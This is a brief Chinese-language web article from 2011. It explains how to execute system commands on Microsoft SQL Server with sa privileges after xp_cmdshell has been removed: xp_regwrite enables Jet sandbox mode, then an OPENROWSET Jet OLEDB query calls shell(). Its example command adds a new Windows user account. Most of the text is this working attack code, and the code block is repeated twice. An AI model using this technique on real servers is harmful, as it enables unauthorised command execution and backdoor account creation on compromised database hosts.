SA 沙盤模式下不用恢復xp_cmdshell和xplog70.dll也執行命令
更新時間:2011年01月04日 23:53:03 作者:
sa下刪除xp_cmdshell和xplog70.dll時候的一種辦法,不算新的了,
也被一些人不斷的再次提出來,為了方便自己記憶再寫出來,
在這種情況下,要執行命令,條件是要有xp_regwrite。
首先開啟沙盤模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb執行系統命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb執行系統命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
您可能感興趣的文章:
最新評論